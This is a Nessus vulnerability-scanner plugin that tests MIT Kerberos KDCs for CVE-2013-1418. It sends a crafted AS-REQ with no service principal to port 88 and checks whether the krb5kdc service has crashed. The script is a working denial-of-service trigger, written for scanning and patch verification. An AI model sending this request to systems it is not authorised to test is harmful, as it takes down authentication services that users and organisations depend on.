The Kerberos service running on the remote host is affected by a remote denial of service (DoS) vulnerability. Attackers can exploit this issue to crash the affected KDC service, resulting in DoS conditions.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
  script_id(70941);
  script_version("1.5");
  script_cvs_date("Date: 2018/07/14 1:59:35");

  # References for the setup_server_realm() KDC crash this plugin tests for.
  script_cve_id("CVE-2013-1418");
  script_bugtraq_id(63555);

  script_name(english:"MIT Kerberos 5 setup_server_realm() Remote DoS");
  script_summary(english:"Tries to crash krb5kdc");

  # Multi-line string literals below are kept exactly as registered
  # (the embedded line break is part of the attribute value).
  script_set_attribute(attribute:"synopsis", value:
"A single sign-on service is affected by a denial of service
vulnerability."
  );
  script_set_attribute(attribute:"description", value:
"The Kerberos service running on the remote host is affected by a remote
denial of service (DoS) vulnerability. Attackers can exploit this issue
to crash the affected KDC service, resulting in DoS conditions."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://krbdev.mit.edu/rt/Ticket/Display.html?id=7757"
  );
  script_set_attribute(
    attribute:"solution",
    value:"Update the affected krb5 package."
  );

  # Availability-only impact, medium access complexity, no authentication.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_attribute(
    attribute:"exploitability_ease",
    value:"No known exploits are available"
  );
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"patch_publication_date", value:"2013/11/05");
  script_set_attribute(attribute:"plugin_publication_date", value:"2013/11/18");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:mit:kerberos:5");
  script_end_attributes();

  # The check works by actually crashing the KDC when it is vulnerable,
  # so it is classified as destructive and only runs in scans that allow it.
  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_copyright(english:"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.");
  script_family(english:"General");

  script_dependencies("find_service.nasl");
  script_require_ports("Services/krbtgt", 88);

  exit(0);
}
include("audit.inc");
include("kerberos_func.inc");
include("global_settings.inc");
include("misc_func.inc");
# Locate the KDC. find_service.nasl registers it as 'krbtgt' (apparently
# only for MIT Kerberos); fall back to the standard Kerberos port 88.
port = get_service(svc:'krbtgt', default:88, exit_on_fail:TRUE);
if (!get_port_state(port)) audit(AUDIT_PORT_CLOSED, port);

sock = open_sock_tcp(port);
if (!sock) audit(AUDIT_SOCK_FAIL, port, 'TCP');

# The client principal and realm are placeholders derived from the plugin
# name; they only need to be well-formed, not known to the KDC.
realm = 'REALM_' + SCRIPT_NAME;
principal = 'principal_' + SCRIPT_NAME;

# Build an AS-REQ (msg-type 10, wrapped in APPLICATION tag 0x6A) whose
# req-body carries no service principal and no pre-authentication data.
# A KDC affected by CVE-2013-1418 is expected to crash in
# setup_server_realm() while processing it.
body = der_encode_kdc_req_body(principal:principal, realm:realm, service:NULL);
kdcreq = der_encode_kdcreq(pvno:5, msg_type:0x0A, list:NULL, req_body:body);
msg = der_encode(tag:0x6A, data:kdcreq);

# Kerberos over TCP prefixes each message with a 4-byte big-endian length
# whose high bit is reserved, hence the 0x7fffffff mask before framing.
frame = raw_dword(d:strlen(msg) & 0x7fffffff, be:TRUE);
send(socket:sock, data:frame + msg);
close(sock);

# No KDC reply is parsed: the only signal is whether the service still
# accepts connections afterwards, so give it a moment to go down.
sleep(1);
state = service_is_dead(port:port);

# NOTE(review): a "not vulnerable" result only means the KDC survived this
# one request; the crash path reportedly depends on the KDC's realm
# configuration, so a clean result does not prove the fix is installed.
if (state == 1) security_warning(port:port);
else if (state == -1) exit(0, 'An attempt to connect to remote TCP port ' + port + ' timed out.');
else if (state == 0) audit(AUDIT_LISTEN_NOT_VULN, 'KDC', port);